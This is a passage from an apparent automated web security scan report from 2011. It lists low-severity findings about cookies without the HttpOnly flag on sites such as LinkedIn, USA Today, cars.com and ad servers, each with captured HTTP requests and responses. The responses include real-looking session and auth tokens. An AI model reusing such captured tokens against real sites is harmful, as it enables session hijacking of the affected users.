Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097447;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f2;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 00:50:47 GMT
Content-Length: 3826

TRC.callbacks.recommendations_1({"trc":{"req":"48e76b6e191407b87e2eaaa3fddbfe40","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-
...[SNIP]...

14.8. http://www.cars.com/go/crp/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cars.com
Path:   /go/crp/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/crp/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:10 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000Wi7Ob1JlqbXe34f3Rg8tOMg:15mijjg76; Path=/
Set-Cookie: Registration=currentUserId:os2h00mIJBCqaXrpC3yMnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQuctqROfU3Gx6shhrLor0ffNW2iOUVe7nWvIF4VeWiUYU=; Expires=Fri, 02 Sep 2016 01:25:27 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=national; Expires=Sun, 25 Sep 2011 01:25:27 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:27 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   

<meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...

14.9. https://www.linkedin.com/secure/login

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:8lJ4lDkdP0OE0h6j6mXCCjzzzkaomys3-lXw4IkIpLaKrVERcPeQ09:1315099580:26e1b09e2a8704070bf09a8c9ebfe0696266e3a0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:56:19 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:26:19 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:58:50 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

14.10. http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.traffic.com
Path:   /Charlotte-Traffic/Charlotte-Traffic-Map.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Charlotte-Traffic/Charlotte-Traffic-Map.html HTTP/1.1
Host: www.traffic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_jk/1.2.25
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Set-Cookie: JSESSIONID=2324C6551511416646806539E2235D03.trafficfe; Path=/
Content-Language: en
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 40345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-e
...[SNIP]...

14.11. http://www.usatoday.com/community/profile.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usatoday.com
Path:   /community/profile.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/profile.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30689
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQSTDCBD=PLPNKDFBOKBABODIEEPNMHMM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- EdSysObj ID="script_container0" FRAGMENTID="35211456" egiordan --><script
...[SNIP]...

14.12. http://www.usatoday.com/marketing/feedback.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usatoday.com
Path:   /marketing/feedback.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /marketing/feedback.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35984
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCACSACD=JEHEEDFBBDOBLPCOJAALENNI; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- EdSysObj ID="script_container0" FRAGMENTID="" --><!-- /EdSysObj -->
<sc
...[SNIP]...

14.13. http://www.usatoday.com/marketing/questions.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usatoday.com
Path:   /marketing/questions.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /marketing/questions.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79083
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQQCSTTD=HFENPINAOJGOOPKGOLAKELOM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:34 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">OAS_listpos =
"InvCount,PageCount,AdOps1,Top7
...[SNIP]...

14.14. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aTnsXDNj6WqoyhURALhZcBrHwBvZaUWbjSqX2DmFYQP3yOAgnNKGLlr9eglkIxJOkrcm2VawOaWiZbjMoBQ; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 01:01:39 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 368
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aSmMvf4drZdSsZbF4P3HpHaqTHfh0rQjYUF90qEpSrrHWUY0THUWmFQmRUFs1q3s4TFc2q7XnTFGXFZbfUWMRoAMBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRY
...[SNIP]...

14.15. http://ad.360yield.com/match

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.360yield.com
Path:   /match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /match HTTP/1.1
Host: ad.360yield.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=54acfc8c-ecc8-4682-8bdb-ca423a9d65bf; path=/; expires=Tue, 03 Sep 2013 01:21:07 GMT; domain=ad.360yield.com
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sun, 04 Sep 2011 01:21:07 GMT
Connection: close


14.16. http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N763.no_url_specifiedOX2619/B5770010.3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N763.no_url_specifiedOX2619/B5770010.3 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://espn.go.com/college-football/team/_/id/99/lsu-tigers?ex_cid=2011_bnnr_CFB_xxxx_awrs
Set-Cookie: id=229b025847010047|1181183/541316/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 04 Sep 2011 01:21:32 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


14.17. http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N763.usatoday.comOX3622/B5770010.5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N763.usatoday.comOX3622/B5770010.5 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://espn.go.com/college-football/team/_/id/99/lsu-tigers?ex_cid=2011_bnnr_CFB_xxxx_awrs
Set-Cookie: id=229b025847010047|1181183/552924/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 04 Sep 2011 01:21:29 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


14.18. http://ad.turn.com/r/cs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /r/cs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cs?pid=18 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771; rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8932325985038971405; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:14:01 GMT; Path=/
Location: http://sync.adap.tv/sync?type=gif&key=turn&uid=8932325985038971405
Content-Length: 0
Date: Sun, 04 Sep 2011 01:14:00 GMT


14.19. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=6&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:49 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:05:49 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&rnd=4338981458170383181&fpid=6&nu=n&t=
...[SNIP]...

14.20. http://ad.yabuka.com/statsin/adframe/803/300x250

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yabuka.com
Path:   /statsin/adframe/803/300x250

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /statsin/adframe/803/300x250 HTTP/1.1
Host: ad.yabuka.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 00:44:40 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Set-Cookie: client_id=laFpD31Wk2; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tc="cDF77OkBNtpIeBFOSP/PqGtaKOk=?_expires=STEzMTU1MTEwODAKLg==&client_id=UydsYUZwRDMxV2syJwpwMQou"; Domain=.yabuka.com; expires=Thu, 08-Sep-2011 19:44:40 GMT; Path=/
Content-Length: 2211

(function(c){var d=typeof ybk_url_prefix=="undefined"?"":ybk_url_prefix,e=typeof ybk_url_suffix=="undefined"?"":"/"+ybk_url_suffix;document.write('<style type="text/css">.yabuka_300x250{width:298px;he
...[SNIP]...

14.21. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?id=1006093&id=1086373&id=1264419&id=1086372&id=1086371&id=1086370&id=1086369&id=1347038&id=1086733&id=1404407&id=317325&id=75921&id=1061877&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; bh="b!!!!H!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#eP^!!!!#=3*$x!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea"

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:17 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!U!!-O3!!!!$=3G@^!!Os7!!!!$=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!$=3G@^!#bw^!!!!$=3G@^!#eP^!!!!#=3*$x!#fBj!!!!$=3G@^!#fBk!!!!$=3G@^!#fBl!!!!$=3G@^!#fBm!!!!$=3G@^!#fBn!!!!$=3G@^!#fG+!!!!$=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!$=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3IO!!!!$=3G@^!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!$=3G@^"; path=/; expires=Tue, 03-Sep-2013 00:42:17 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 00:42:17 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 426
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.22. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=f09828 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rsiPus_gdim="MLtXrENrsF9nIAF6D3M7i/STKTrao6ps1I2AZRCKRzqmb8KlQQV8QUt2e6OtBgskIhKdoOJ1yHmxJTFNs4gGJaXsDU5PQU6EmolVCb+84ccdyh4mNwNw3VCsrR0XLTokq11VBVXRQRrYd0tfXWhpelt1T+ejBzpqRApnt1cCwfS5wRS+B+A8nIViBS1MMsBx87o2wCOaDxZn61tSbRAX"; rsi_us_1000000="...[SNIP]..."; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZmgoUly6wQ7sd+KSCvcGhz3F7fYu+DFw; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; udm_0=...[SNIP]...; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bTBF="MLtXrEVrsC9jIDFi7XZS/nWyofj8uo4h4hQaMt62x2xHbq9QZyFp4272ogDQaLmA/RMWitRUcC8I7G491XGtkTPsKy5HIvJesYX30b0qu8WXX0HfMJuA3FHVw11laB3EptDJ+unN4T4giuXzXvB3z+ILY6CVMUX/pUeIutokG4ey0jUb+KUX7E2rAO9SAXGUST7XghGegzEMIVRrVRs="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 883

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.23. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

